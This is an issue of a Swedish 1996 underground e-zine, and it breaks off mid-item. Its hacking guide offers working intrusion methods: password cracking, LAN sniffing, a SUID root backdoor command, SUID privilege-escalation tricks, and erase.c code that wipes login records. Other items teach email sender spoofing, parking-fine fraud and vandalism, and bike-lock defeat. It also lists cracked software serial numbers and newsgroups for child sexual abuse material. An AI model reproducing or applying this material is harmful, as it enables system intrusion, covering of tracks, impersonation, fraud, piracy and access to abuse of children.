____________________________________________________________________________ FLASHBACK NEWS AGENCY (FNA) #53 Vol.2 No.35 - 26 Augusti 1996 - Gratis - Email: fna@flashback.se Antal Prenumeranter: 6337 (+335) REDAKTÖR: Jan Axelsson MEDARBETARE (#53): Claun, Erik, E.t., ghost, Hau, J, LordB, Nisseman, Sten Bumling, TeknoHead, Uffe Puffe ____________________________________________________________________________ Veckans innehåll: o Ledare 960826 (J.A.) o FNA:s Free Speech tävling II - Augusti 1996 (-) o Överraska dina vänner med Email från statsministern (Erik) o Tips på hur man slipper P-böter (Sten Bumling) o Nybörjarguide för hackers (LordB) o Så dyrkas ett slanglås (LordB) o Livets Ords hemsida saboterad för tredje gången (J.A.) o Windows World tipsar sina läsare om piratkopierade program (Claun) o Amerikanska justitiedepartementets hackade hemsida nu upplagd på Flashbacks Webhotel (J.A.) o Chokladberoende (E.t. & Claun) o Feedback (Uffe Puffe) o Flashback crackz (ghost & Hau) o Barnporr på Internet (J.A.) o Ravers bojkottar Denvers MC? (J) o När kan polisen kräva blodprov av dig (TeknoHead) o Annonsstopp för piratdekodrar (-) o Arla fick besök av hackers i söndags (montezuma) o PS. - Kolla in (J.A.) ====================================== Ledare 960826: I förra veckan uppstod en mängd missförstånd. När jag informerade om våra nya mailinglistor, så trodde folk bl.a. att FNA var en mailinglista. Många blev även oroliga över att de inte skulle få bli kvar på utskickslistan osv. Därför kommer här en *kort* redogörelse ang. FNA, FML och FIL. FNA (Flashback News Agency) är Flashbacks elektroniska veckotidning. Här informerar vi *alla* som är intresserade om tips, notiser, vad som är på gång (eller vad som hänt) osv. En nyhetsbyrå med inriktning på i huvudsak underground. ALLA är välkomna som läsare, oavsett om du hjälper oss med tips eller ej. Oavsett ifall du hatar eller älskar oss. Kort sagt; FNA är till för alla. FNA är också gratis. Du behöver m.a.o. inte prenumerera på Flashback för att få FNA. Det är OK att skicka FNA till vänner, och det är OK att stjäla artiklar från FNA då vi som bekant inte tror på copyright. Varför skall någon *äga* information? Vi stjäl från alla (oavsett vad de tycker) och uppmanar andra att göra samma sak med oss. FML (Flashback Mailing List) och FIL (Flashback Information List) är två mailinglistor. En mailinglista är en diskussionslista där deltagarna *diskuterar* olika ämnen. Om en person gör ett inlägg, så får samtliga på listan denna persons inlägg. För att deltagarna inte skall drunkna i mail, så måste antalet personer i listan begränsas. Dessa listor riktar sig m.a.o. *endast* till de med *mycket god* förankring inom undergroundscenen. Inga wannabees är välkomna. Här finns heller inte plats för några pubertala flamewars. De som skriver för att synas åker omedelbart ut. Listan är *endast* till för de som är en del av scenen. De som vill vara med skall berätta vad de sysslar med; har du något skivbolag, ger du ut någon tidning, har du någon hemsida, har du crackat någons hemsida, har du ofta hembesök av polisen (eller SÄPO), vet du saker som kan *tillföra* listan något. Endast då är du välkommen. Vad är då underground. Flashbacks mailinglista har funnits sedan april, och diskussionerna har handlat om det mesta; satanism, snuff movies, gaykultur, konst av massmördare, nazism, droger, anarkism, hackers osv. osv. Kort sagt, det mesta som du hittar i Flashback brukar debatteras. En bra mailinglista har ett 50-tal deltagare. Detta betyder att mindre än 1% av FNA's deltagare har en chans att få vara med. Men vill du ansöka så är mitt råd; skicka MYCKET information om dig själv. Har du ingen anknytning till undergroundscenen, avstå från att ens ansöka. Trösta dig istället med FNA och Flashback, eller förändra din situation. Se till att även *du* blir en del av scenen. Lycka till. Jan Axelsson. ------------------------------ * FNA:S FREE SPEECH TÄVLING II - AUGUSTI 1996 Tipsa FNA med information & vinn fina priser! I potten denna månad: * BLACK PHILES.1 + BLACK PHILES.2 (CD-ROM) Två fullpackade CD-Rom samlingar med Hacking / Phreaking / Anarchy / Drugs / Bombs / UFO's / Occult / Conspiracy / Security / Computers / Programming... Totalt över 36000 (trettiosex tusen) filer!!! YTTERLIGARE INFO: http://www.algonet.se/~synchron/ eller: synchron@algonet.se * DEN SATANISKA BIBELN - ANTON LAVEY (BOK) Svensk översättning av satanismens klassiker nummer ett; The Satanic Bible. Anton LaVey som 1966 bildade Church of Satan, skrev tre år senare denna bestseller som på engelska har sålt över 800.000 exemplar. YTTERLIGARE INFO: http://flashback.se/~lookingglass/ eller: carl@lgc.se * REALITY - ALLA SPELS VÄRSTING (SPEL) Spelet som i höstas orsakade stora rubriker i dagstidningar över hela landet. Spelet, påstods det, skulle lära ungdomar att knarka och liknades vid monopol för brottslingar m.m. 100% underground! Inget för känsliga personer! YTTERLIGARE INFO: http://www.df.lth.se/~beaker/reality.html eller: beaker@df.lth.se * FLASHBACK #2 + FLASHBACK #3 (TIDNING) Flashbacks andra och tredje nummer. Slutsålda sedan länge! 152 fullpackade A4-sidor. Offsettryck. Ur innehållet: Siewert Öholms rättegångshandlingar (där han bl.a. är åtalad för våldtäkt m.m.), Stockholms våldtäktsmän 90/91 (komplett lista med namn, adresser, tel.nummer och bilder m.m.), Namnen & adresserna till de som beställde filmer från barnporrsrättegången, Lista på alla filmer som blivit klippta av filmcensuren resp. distributören under åren 1978-1993 och mycket, mycket mer. OBS: Samlarvärde!! YTTERLIGARE INFO: http://www.flashback.se/ eller: flashback@flashback.se Det enda du behöver göra är att förse oss med information. Allt från civ. polisbilar och passwords till skojiga notiser och artiklar. Allt med undergroundprägel är av STORT intresse! Om du vill vara med och tävla, så behöver vi följande info: * DITT NICKNAME. I stort sätt alla våra bidragsgivare kräver 100% garanterad anonymitet. Därför har de "nicknames" istället. En sort pseudonym. Men vill du ha ditt riktiga namn i tidningen, så är givetvis det OK. * VAD VILL DU HA IFALL DU VINNER? Skriv gärna en "topplista". Vi vill givetvis helst ge dig det pris som du önskar. Glöm därför inte att informera oss. SAMTLIGA TIPS SKICKAS TILL: fna@flashback.se Vinnarna kommer att presenteras i FNA #54. Alla bidragsgivare garanteras 100% anonymitet. Vinner gör den som kommit med bästa bidraget alt. flest användbara bidrag under månaden. Kort sagt, den som tillfört FNA mest under Augusti månad. ------------------------------ * ÖVERRASKA DINA VÄNNER MED EMAIL FRÅN STATSMINISTERN Det är inte varje dag man får Email från Göran Persson, men om du vill att någon av dina kompisar ska få det, behövs bara en mycket grundläggande kunskap om hur SMTP fungerar. När ett mail sänds över Internet sker nämligen det genom en kedja av datorer, där var och en loggar in på en annan och berättar om mailet som ska vidarebefordras. Det finns bara ett krux med detta, att ingen av dessa datorer använder någon som helst autenticiering, dvs vilken dator som helst kan logga in på vilken annan dator som helst och skicka brev från vem som helst till vem man vill. (På senare tid har vissa mailservrar fått större säkerhet på detta område, så de varnar för att allt inte verkar rätt.) När en dator loggar in på en annan används ett textprotokoll med mycket enkla kommandon. Det gör att allt man behöver är ett telnetprogram och att logga in på rätt port hos servern. SMTP-porten är alltid nr 25, så för att logga in hos Statsministern är det bara att skriva $ telnet mail.sb.gov.se 25 vid en bashprompt (för Windows/Mac-användare ser det förstås annorlunda ut). Du kommer att mötas av ett meddelande som berättar att regeringens mailserver är redo att ta emot ett meddelande. Vad du skriver nu är ganska enkelt: mail from: "Statsminister Göran Persson"rcpt to: din_vän@hennes.adress.se data Skriv vad du vill här, till exempel att ... att ... att Göran Persson gärna skulle vilja ha en date (om det är en tjej du skriver till) (Vid närmare eftertanke det även skulle gälla för en kille ... :) ) Avsluta med en ensam punkt på en rad: . Sedan loggar du ut med quit Så enkelt är det att skicka anonyma email till vem som helst från en valfri avsändare. Eftersom det var Statsrådsberedningens egen mailserver vi loggade in på är det mycket svårt att spåra denna sortens email. (Inskickat av: Erik) ------------------------------ * TIPS PÅ HUR MAN SLIPPER P-BÖTER Här kommer div. tips på förslag för den som vill slippa betala p-böter. 1. Så fort som du finner boten så ska du bege dig till en bensinmack och leta bensinkvitton som tidsmässigt överensstämmer med boten. Ta sedan detta och bege dig till närmsta polisstation. Där du påpekar det inträffade, att du givetvis har haft soppatorsk och bara gått till macken. Påpeka att du hade satt upp lapp om det på rutan eller dylikt. 2. Ta en sprayflaska med lämplig färg och spraya över alla skyltar där du kan se att det råder p-förbud. Detta anmäler du sedan till p-bolaget. Ja, för du kunde ju inte se att p-förbud rådde. Det funkar faktiskt att spraya direkt efter boten. 3. Stoppa i konstiga grejjor i p-automatens myntinkast varefter du anmäler just den/de automaterna som obrukliga till p-bolaget. Ta sedan och sätt upp lappar på de bilar som också har fått p-böter. Där du förklarar att automaten/erna är ur funktion och att de också ska anmäla detta för att få boten avskriven. 4. Kanske det bästa, men du ska ha kontakt med någon person som inte har några skrupler inför skulder. Denna person skriver du ett leasingavtal med. Alltså han leasar din bil, för du står ju fortfarande som ägare till den. I detta fall kan du fullständigt strunta i allt vad p-avgifter heter. (Inskickat av: Sten Bumling) ------------------------------ * EN NYBÖRJARGUIDE FÖR HACKERS (eller: Jag går och fiskar (passwords under UNIX)) Denna text innehåller ingen ny eller revolutionerande information. Den är mest avsedd för nybörjarhackare men även erfarna hackare kan kanske snappa upp nåt användbart tips. Som vanligt tar jag inget ansvar för vad folk gör med denna information. När man loggar in på ett UNIX konto anger man först login och sedan lösenord. Så här kan det se ut: login: snorre password: ******* Lösenordet (password) kan vara upp till 8 tecken (ej å, ä, ö). 90 % av allt nätverkshackande går ut på att fiska lösenord. Genom åren har hackare kommit på mängder av mer eller mindre snillrika metoder att komma över dessa lösenord. Det mest eftertraktade lösenordet är root-lösenordet. Root är systemadministratörens login. Om man loggar in som root har man samma rättigheter som sysadmin. Det kallas Root-privilegier eller root-rättigheter, eventuellt system rättigheter/privilegier (kvarleva från vax/vms). Att ha root privilegier innebär bl a att man kan ta bort/lägga till användare från systemet. Man kan se vad alla gör, döda deras processer, läsa deras e-mail osv osv... Det finns andra sätt att skaffa sig root privilegier än att komma över root passwordet, men låt oss börja med password fisket. Metod 1: /etc/passwd Alla användare och deras lösenord finns lagrade i filen /etc/passwd. /etc/passwd är läsbar för ALLA! Dock är systemet inte så huvudlöst som det kan verka, bara nästan. Användarnas lösenord i /etc/passwd är krypterade. Krypteringsalgoritmen är känd, men den är inte reversibel. Det går alltså inte att dekryptera, bara att kryptera. Loginprogrammet krypterar lösenordet som skrivs in och jämför med det i /etc/passwd. Vad skaparna av UNIX inte tänkte på är att det går att gissa lösenord. Man behöver inte försöka logga in om och om igen heller. Eftersom algoritmen är känd kan man plocka det krypterade lösenordet från /etc/passwd och sedan prova att kryptera ord från en ordlista och jämföra med det krypterade lösenordet. Mängder med ordlistor finns att hämta på bl a "ftp://ftp.ox.ac.uk/pub/wordlists/". Program som tar en passwd fil och en ordlista och försöker knäcka lösenord i passwd filen kallas crackers. Den vanligaste för UNIX är crack. Crack finns att hämta på "ftp://ftp.cert.org/pub/tools/crack/". Som jag sa så kan sysadmin se vad du gör. Om han ser att du kör CRACK så kommer han att döda processen snabbare än du hinner säga BIG JIM och sparka ut dig från systemet. Om du däremot har LINUX hemma kan du köra det i lugn och ro. För MSDOS finns t ex Cracker Jack: "ftp://ftp.fc.net/pub/phrack/underground/misc/jack14.zip". På nyare system som t ex SOLARIS så är password filen skuggad. Det innebär att de krypterade lösenorden inte finns i /etc/passwd utan i nån annan fil, vanligen /etc/shadow. För att läsa /etc/shadow behövs root rättigheter. Vilken ironi, det var ju det som var målet med password fisket, att skaffa root rättigheter. En skuggad /etc/passwd känns igen genom att det är en * eller ett X där det krypterade passwordet brukar stå. Om man lyckas skaffa sig rooträttigheter mha någon annan metod så kan man återskapa passwd filen så att den går att köra i t ex crack mha följande C-program: 8<-------------------------------------------->8 /* unshadow.c */ /* kompilera med cc -o unshadow unshadow.c */ #include main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 8<-------------------------------------------->8 Kom ihåg att unshadow måste (oftast) köras med rootprivilegier. Alltså krävs andra metoder att skaffa privilegier. Metod 2: Sniffa Ethernet Idealiska förhållanden för att sniffa ethernet är i en skola/företag med ett lokalt nätverk där DU har tillgång till en PC som är uppkopplad till nätverket (med nätverkskort, inte modem). I ett lokalt nätverk används broadcasting, dvs alla paket skickas till alla datorer. När en dator tar emot ett paket kollar den först huvudet för att se vilken dator paketet ska till, om paketet är till en annan dator slängs det annars tas resten av paketet emot. Det går att programmera om nätverkskortet till att ta emot ALLA paket, oavsett vem adressaten är. Detta läge hos nätverkskortet kallas promiscous mode. Vissa nya kort är spärrade så att de ej går att ställa om i promiscous mode men jag har aldrig sett ett sånt, dessutom räcker det med EN dator som har ett "fungerande" kort för att kunna sniffa ethernetpaket. OK, nu behövs ett program som ställer om nätverkskortet i promiscous mode och loggar det som pågår på LAN:et (Local Area Network). Det bästa heter NETZHACK och går under MSDOS. NETZHACK finns bl a på: "ftp://ftp.surfnet.nl/mirror-archive/software/simtel-msdos/pktdrvr/" För att kunna köra NETZHACK så måste en paket drivrutin installeras först. Starta PC:n i rent dos läge (ingen dos-prompt). Kör igång NETZHACK, om ingen paket drivrutin finns installerad så klagar NETZHACK. Ladda hem en drivrutin från t ex: "ftp://ftp.ftp.com/pub/packetd". Installera paketdrivrutinen (på t ex 0x060) och kör igång NETZHACK igen. Som du kanske märker så skickas en MASSA information på LAN:et hela tiden. Tryck på 5 för att bara övervaka telnet, rlogin, e-mail, ftp. Det är där det intressanta sker, nu ser du ALLA e-mail som skickas, alla inloggningar (telnet, rlogin och ftp) över LAN:et. Nu är det bara vänta på napp (root loggar in). Om du befinner dig i t ex en datasal så tryck q för att stoppa screendumpen. Då skrivs informationen bara till loggfilen. Det kan annars se en aning misstänkt ut när passwords, e-mail och andra skumma teckenkombinationer strömmar över din skärm :-) TIPS: sök efter pass i loggen, då hittar du alla ställen där ett password skrivits in. Det finns även ethernet sniffare till UNIX men man måste ha root rättigheter för att köra dem och dessutom kan sysadmin, som vanligt, se vad du gör . . . NETZHACK är omöjlig att spåra. Enda sättet du kan åka dit på är att bli tagen på bar gärning, och då får du skylla dig själv. Som jag nämnde tidigare finns det metoder att skaffa sig root privilegier utan tillgång till root passwordet. METOD 3: SUID program I UNIX har filer olika rättigheter för läsning, skrivning och exekvering. Dessa rättigheter kan sättas för ägare, grupp och andra. Se UNIX manual-sidor för mer info. Ett SUID program har Set User ID bitten satt. Det innebär att när en användare kör programmet så övertar användaren ägarens identitet. Ett typiskt SUID program är passwd kommandot. Med passwd ändrar man sitt lösenord. Det innebär att /etc/passwd filen ändras av passwd kommandot. Men en vanlig användare får INTE skriva till /etc/passwd filen. Lösningen är att passwd programmet har SUID bitten satt och ägs av root. Alltså har man root privilegier när man kör passwd. Tyvärr försvinner rootprivilegierna när programmet avslutas. Många hackers har fått SUID program att spåra ur och göra saker som från början inte var tänkt med dem. Urspårade SUID program är faktiskt ett av de vanligaste säkerhetsålen i UNIX. Det dyker ständigt upp nya sådana här hål och gamla täpps igen. För att hålla sig uppdaterad kan man besöka 8lgm: www.8lgm.org eller någon #hack kanal på IRC. Räkna bara inte med att folk serverar hålen på ett silverfat, du bör sitta på ett par själv som du kan tradea med. Idealet är att få ett SUID root shell, dvs en kommandotolk med root rättigheter. Om man lyckats skaffa sig root rättigheter kan man enkelt tillverka ett SUID root shell genom att kopiera en kommandotolk, t ex /bin/sh, till någon kryptisk plats i filsystemet och sedan ändra rättighetterna på sh. Ex. cp /bin/sh /tmp/.backdoor; chmod 4777 /tmp/.backdoor Detta brukar kallas för en bakdörr (kalla den INTE för .backdoor som i exemplet!). En bra plats att lägga en bakdörr är i .netscape-cache eller nån annan katalog som vanligtvis bara innehåller en massa skräp som ingen orkar rota i. Skapa gärna underkataloger som " .. ". Det förvillar eftersom ".." är parent directory. Ex: mkdir ".. "; cd ".. ", glöm inte citations tecknen, annars kommer du till just parent directory. Det är inte helt otroligt att någon annan hacker redan har huserat i ditt system. Sök efter skumma SUID program med "find / -perm -4000 -print" Nu kommer det upp en massa systemfiler som det kan finnas säkerhetshål i. Om det finns bakdörrar installerade så dyker även dessa upp (om du har läsrättigheter till dem). Om något av SUID programmen ägs av root OCH du har skrivrättigheter till det så är saken klar. Kopiera bara /bin/sh över SUID programmet. Om du vill vara trevlig kan du ju först göra en kopia av SUID programmet innan du skriver över det. Här är ett utdrag ur alt.2600 haq faq om hur roligt man kan ha med suid program. Haq faq finns bl a på: "http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq-1.htm" 12. How do I gain root from a suid script or program? 1. Change IFS. If the program calls any other programs using the system() function call, you may be able to fool it by changing IFS. IFS is the Internal Field Separator that the shell uses to delimit arguments. If the program contains a line that looks like this: system("/bin/date") and you change IFS to '/' the shell will them interpret the proceeding line as: bin date Now, if you have a program of your own in the path called "bin" the suid program will run your program instead of /bin/date. To change IFS, use this command: IFS='/';export IFS # Bourne Shell setenv IFS '/' # C Shell export IFS='/' # Korn Shell 2. link the script to -i Create a symbolic link named "-i" to the program. Running "-i" will cause the interpreter shell (/bin/sh) to start up in interactive mode. This only works on suid shell scripts. Example: % ln suid.sh -i % -i # 3. Exploit a race condition Replace a symbolic link to the program with another program while the kernel is loading /bin/sh. Example: nice -19 suidprog ; ln -s evilprog suidroot 4. Send bad input to the program. Invoke the name of the program and a separate command on the same command line. Example: suidprog ; id Som du kanske märkt kräver de flesta av de här metoderna att du redan har ett konto på maskinen du försöker bringa på knä. Om jag skulle gå in på remote hackande skulle denna text bli alldeles för stor, men det finns bra texter om remote hacking där ute. Om du nu lyckas med någon av ovanstående metoder: LOGGA ALDRIG IN SOM ROOT OM DU INTE VET EXAKT VAD DU HÅLLER PÅ MED! Annars kommer du åka dit så det stänker om det. Sist men inte minst: SOPA IGEN ALLA SPÅR EFTER DIG! Om du tycker dig ha allt under kontroll och bestämmer dig för att göra ett hack, lämna inga elektroniska fingeravtryck. Allt du gör loggas. En del system har skräddarsydda loggar. I filen /etc/syslog.conf specificeras vad som loggas av loggdaemonen =8-O syslogd. Nedanstående program suddar bort dig från standardloggarna. Erase.c är hämtat från haq faq. Erase tar login som argument, ex: erase opalme 8<-------------------------------------------->8 /* erase.c */ #include #include #include #include #include #include #include #include #define WTMP_NAME "/usr/adm/wtmp" #define UTMP_NAME "/etc/utmp" #define LASTLOG_NAME "/usr/adm/lastlog" int f; void kill_utmp(who) char *who; { struct utmp utmp_ent; if ((f=open(UTMP_NAME,O_RDWR))>=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 ) if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof( utmp_ent )); lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); write (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } void kill_wtmp(who) char *who; { struct utmp utmp_ent; long pos; pos = 1L; if ((f=open(WTMP_NAME,O_RDWR))>=0) { while(pos != -1L) { lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); if (read (f, &utmp_ent, sizeof (struct utmp))<0) { pos = -1L; } else { if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *)&utmp_ent,sizeof(struct utmp )); lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); write (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } else pos += 1L; } } close(f); } } void kill_lastlog(who) char *who; { struct passwd *pwd; struct lastlog newll; if ((pwd=getpwnam(who))!=NULL) { if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0); bzero((char *)&newll,sizeof( newll )); write(f, (char *)&newll, sizeof( newll )); close(f); } } else printf("%s: ?\n",who); } main(argc,argv) int argc; char *argv[]; { if (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf("Zap2!\n"); } else printf("Error.\n"); } 8<-------------------------------------------->8 Om du är sugen på att läsa mer så börja med the haq faq. "http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq-1.htm" (Inskickat av: LordB) ------------------------------ * SÅ DYRKAS ETT SLANGLÅS (OM DU T.EX. TAPPAT NYCKELN) De vanligaste slanglåsen, ABUS, är lyckligtvis också de enklaste att dyrka. Det finns två typer av nycklar till ABUS slanglås, höger och vänsternycklar. Om man håller taggarna på nyckeln uppåt så går det ett spår antingen till vänster eller till höger på nyckeln. Skaffa en av varje sort, t ex genom att köpa två slanglås. Dessa två nycklar passar nu de flesta ABUS slanglås (Alla med runda låskolvar, både med vanlig och med krull-slang). Själva dyrkningen: För in nyckeln till hälften i låset. Vrid nyckeln omväxlande till höger och vänster så snabbt som möjligt. För samtidigt långsamt in nyckeln ett hack i taget. Om nyckeln nått botten och låset fortfarande inte gått upp så fortsätt att vrida och för långsamt ut nyckeln till hälften igen. Upprepa detta ett par gånger in och ut. Gör sedan likadant med den andra nyckeln. Ofta går det bara att få in den ena nyckeln i låset. Vridningen måste gå mycket snabbt, det gäller att få in det rätta "darret" i handleden. Detta kan kräva en del övning. Ibland kan det även funka att ruska hej vilt både in, ut, höger och vänster. Akta så inte nyckeln går sönder bara. Av någon anledning fungerar det bättre med begagnade nycklar än helt nya. Om en nyckel fungerar dåligt kan man alltid fila lite på taggarna. Det brukar göra susen. Fysiskt våld Om man inte får upp låset med ovanstående metod och inte drar sig för att förstöra låset kan man alltid forcera låset med fysiskt våld. Plåtsax: Finns både i otymplig vaktmästarvariant och behändig handvariant. Klipp helt enkelt sönder låset. Klipp INTE på kabeln utan klipp i den mjuka metallen vid låskolven. TaeKwonDo: Sparka upp låset. Låt en kompis hålla i cykeln och låset. Sparka med fotsulan rakt mot låskolven så att kraften forcerar upp låset. Detta fungerar på alla slanglås. Det är förvånande att se vilka veka cykellås som tillverkas i Sverige idag. Riktigt gamla slanglås går det faktiskt att vrida upp. Detta är ett vida känt trick, men fungerar bara om låset är riktigt gammalt. (Inskickat av: LordB) ------------------------------ * LIVETS ORDS HEMSIDA SABOTERAD FÖR TREDJE GÅNGEN Livets Ord har återigen haft påhälsning av hackers. Detta var tredje gången på mindre än två veckor. Denna gång (i torsdags) ändrades sidan till att ha ett smurf-tema, och högst upp stod det; "Vakna UPP! Lämna församlingen Dödens Ord. Don't be a robot, use your OWN mind". På sidan fanns också länkar till de två första hacken ("http://flashback.se/~doden/" och "http://flashback.se/~doden2/"). För den som missade den hackade sidan, så finns den nu på Flashbacks Webhotel: http://flashback.se/~doden3/ ------------------------------ * WINDOWS WORLD TIPSAR SINA LÄSARE OM PIRATKOPIERADE PROGRAM. I senaste numret av Windows World kan man läsa: "Den som vill ha tag på billiga upplagor av olika operativsystem och program kan numera bege sig utomlands och handla. Och på köpet tjäna ordrentligt på affären! Föutsatt att man inte bryr sig det minsta om vad som är lagligt, förstås...." Vidare i artikeln berättar dom att dessa skivor säljs på vanliga marknader i bl.a. S:t Petersburg för omkring 50 kronor styck. Ännu billigare är det i Kina där liknande program kostar runt $2 st. (Inskickat av: Claun) ------------------------------ * AMERIKANSKA JUSTITIEDEPARTEMENTETS HACKADE HEMSIDA NU UPPLAGD PÅ FLASHBACKS WEBHOTEL I förra veckans FNA berättade vi att några hackers har tagit sig in på det amerikanska justitiedepartementets hemsida, och ersatt den amerikanska flaggan med en hakkorsflagga samt utsett Adolf Hitler till justitieminister m.m. Nu finns den kompletta "US (Japan's) Department of Injustice Home Page" (som den hade döpts om till) även på Flashbacks Webhotel. URL: http://flashback.se/~doj/ ------------------------------ * CHOKLADBEROENDE Kakao innehåller tre ämnen med verkningar liknande hasch, har forskare vid nervforskningsinstitutet i San Diego i USA funnit. Det rör sig om anandamid, som ger en känsla av välbefinnande, och ytterligare två ämnen som förstärker det förstnämdas effekt, skriver tidskriften Nature (Inskickat av: E.t. & Claun / källa: TT) ------------------------------ * FEEDBACK Under denna rubrik så kommer vi att publicera läsarbrev och rättelser från er läsare. Läsarbrev.1: Jag läste om tricket med ERI 337;an och att men skulle få en ny lur. Sannolikt får man ej en ny lur eftersom man på Service verkstaden på bara någon minut kan uppdatera till en nyare prg-vara som fungerar. Men detta är dock kostnadsfritt om det är fel på den tidigare. En telefon det finn roligare buggar i är dock Siemens S4 där det är felstavat på flera ställen i prg. Testa t ex att starta telefonen utan att ha sim-kortet i. Det roliga är dock att det inte finns någon uppgradering som tar bort dessa buggar utan här kan det bli tal om att häva köpet. Om man nu har den läggningen att man (över?) reagerar för strunt saker. (Inskickat av: Uffe Puffe) ------------------------------ * FLASHBACK CRACKZ Här kommer lite nya crackade serienummer som är speciellt gjorda för FNA's läsare. Observera att username i samtliga program nedan är "Flashback" (eller dyl.). Har du fler bidrag, så skicka dem till: fna@flashback.se. CD Wizzard Name: Flash Reg.nr: 8813 Gold Wave 3.0+ First name: Flash Last name: Back Reg.nr: LQPYLBB NTcrt v.1.0 b6 Name: Flashback Company: Flashback Serial nr: 00-00-000000 Expiration: 01-01-2000 Key: DOFBMU7E40GOMEBVARM94A5LSMNIQKUN WinPack 32 d Dealer key: Flashback Name: Flashback Reg.nr: FU210000U6N10000 WinPGP 4.0 First name: Flash Last name: Back Reg.nr: 175973110 WinImage: Namn: Flashback Nummer: 1EEB31D Usurper: Namn: Flashback BBS namn: Flashback Nummer: 5384516 WinARJ Namn: Flashback Nummer: 154080 NetTerm 2.8 Namn: Flashback Nummer: 9593i7f9 (Inskickade av: ghost & Hau) ------------------------------ * BARNPORR PÅ INTERNET "Rädda Barnen" letar barnporr på Internet, och har nu därför sammanställt en lista över de nyhetsgrupper där möjligheten till att stöta på detta finns. alt.binaries.pictures.boys alt.binaries.pictures.child.erotica.female alt.binaries.pictures.child.erotica.male alt.binaries.pictures.children alt.binaries.pictures.erotic.children alt.binaries.pictures.erotica child alt.binaries.pictures.erotica.child.female alt.binaries.pictures.erotica.child.male alt.binaries.pictures.erotica.children alt.binaries.pictures.erotica.lolita alt.binaries.pictures.erotica.pre-teen alt.binaries.pictures.erotica.teen.fuck alt.binaries.pictures.erotica.young alt.binaries.pictures.lolita.fucking alt.binaries.pictures.lolita.misc alt.sex.boys alt.sex.children alt.sex.fetish.tinygirls alt.sex.girls alt.sex.incest alt.sex.intergen alt.sex.pedophile.mike-labbe alt.sex.pedophilia. alt.sex.pedophilia.boys alt.sex.pedophilia.girls alt.sex.pedophilia.swaps alt.sex.pedophilia.pictures alt.sex.pre-teens alt.sex.teens alt.sex.weight-gain alt.fan.cock-sucking alt.binaries.pictures.voyeurism alt.binaries.pictures.lolita.fucking alt.binaries.pictures.erotica.voyeurism alt.binaries.pictures.erotica.young alt.binaries.pictures.erotica.uniform alt.binaries.pictures.erotica.urine alt.binaries.pictures.erotica.teen.fuck alt.binaries.pictures.erotica.uncut alt.binaries.pictures.erotica.spanking alt.binaries.pictures.erotica.teen.female.masturbation alt.binaries.pictures.erotica.pornstars alt.binaries.pictures.erotica.pre-teen alt.binaries.pictures.erotica.oral alt.binaries.fetish.scat alt.binaries.pictures.erotic.anime alt.binaries.pictures.erotic.centerfolds alt.binaries.pictures.erotic.senior-citizens alt.binaries.pictures.erotica.animals alt.binaries.pictures.erotica.art.pin-up alt.binaries.pictures.erotica.breasts.small alt.binaries.pictures.erotica.butts alt.binaries.pictures.erotica.cheerleaders alt.binaries.pictures.erotica.disney alt.binaries.pictures.erotica.fetish.feet alt.binaries.pictures.erotica.fetish.hair alt.binaries.pictures.erotic.senior-citizens alt.binaries.pictures.erotica.teen alt.binaries.pictures.erotica.male.anal alt.sex.pedophile.mike-labbe alt.sex.masturbation alt.sex.fetish.tickling alt.sex.fetish.waifs alt.sex.fetish.watersports alt.sex.fetish.wrestling alt.sex.first-time alt.sex.fetish.girl.watchers alt.sex.homosexual alt.sex.incest alt.sex.intergen alt.sex.jp alt.sex.magazines alt.sex.masturbation alt.sex.movies alt.sex.necrophilia alt.sex.pedophilia alt.sex.pictures alt.sex.pictures.female alt.sex.pictures.male alt.sex.services alt.sex.spam alt.sex.spanking alt.sex.stories alt.sex.strip-clubs alt.magazines.pornographic alt.magick.sex alt.personals.spanking.punishment alt.sex. alt.sex.anal alt.sex.bestiality alt.sex.bondage alt.sex.breast alt.sex.enemas alt.sex.exhibitionism alt.sex.fat alt.sex.fetish.diapers alt.sex.fetish.fa alt.sex.fetish.feet alt.sex.fetish.hair alt.sex.fetish.orientals alt.binaries.multimedia.erotica alt.binaries.pictures.boys alt.binaries.pictures.children alt.binaries.pictures.erotica alt.binaries.pictures.erotica.amateur.d alt.binaries.pictures.amateur.female alt.binaries.pictures.amateur.male alt.binaries.pictures.erotica.anime alt.binaries.pictures.erotica.bestiality alt.binaries.pictures.erotica.blondes alt.binaries.pictures.erotica.bondage alt.binaries.pictures.erotica.cartoons alt.binaries.pictures.erotica.female alt.binaries.pictures.erotica.furry alt.binaries.pictures.erotica.gaymen alt.binaries.pictures.erotica.male alt.binaries.pictures.erotica. orientals alt.binaries.pictures.erotica.pregnant alt.binaries.pictures.erotica.teen alt.binaries.pictures.erotica.teen.d alt.binaries.pictures.girlfriend alt.binaries.pictures.girlfriends alt.binaries.pictures.girl alt.binaries.pictures.horny.nurses alt.binaries.pictures.pictures.nudism alt.binaries.pictures.tasteless alt.homosexual alt.sex.swingers alt.sex.telephone alt.sex.trans alt.sex.wanted alt.sex.watersports alt.sex.bestiality.pictures alt.sex.children alt.sex.cu-seeme alt.sex.fetish.scat alt.sex.fetish.tinygirls alt.sex.fetish.wet-and-messy alt.sex.oral alt.sex.orgy alt.sex.pedophilia.girls alt.sex.pedophilia.pictures alt.sex.pictures.d alt.sex.stories.gay alt.sex.stories.tg alt.sex.super-size alt.sex.tasteless alt.sex.teens alt.sex.video-swap alt.binaries.pictures.erotica.black.male alt.binaries.pictures.erotica.children alt.sex.sm.fig ------------------------------ * RAVERS BOJKOTTAR DENVERS MC? Följande notis spreds i en raverelaterad mailinglista nyligen: "Sen finns det lite mer inside information... mc klubben DENVERS (som brukar ha goafester ibland) ligger ett par km från festplatsen, och anser att det är deras territorium, så de kom nedstormande på Phase på Lördan och 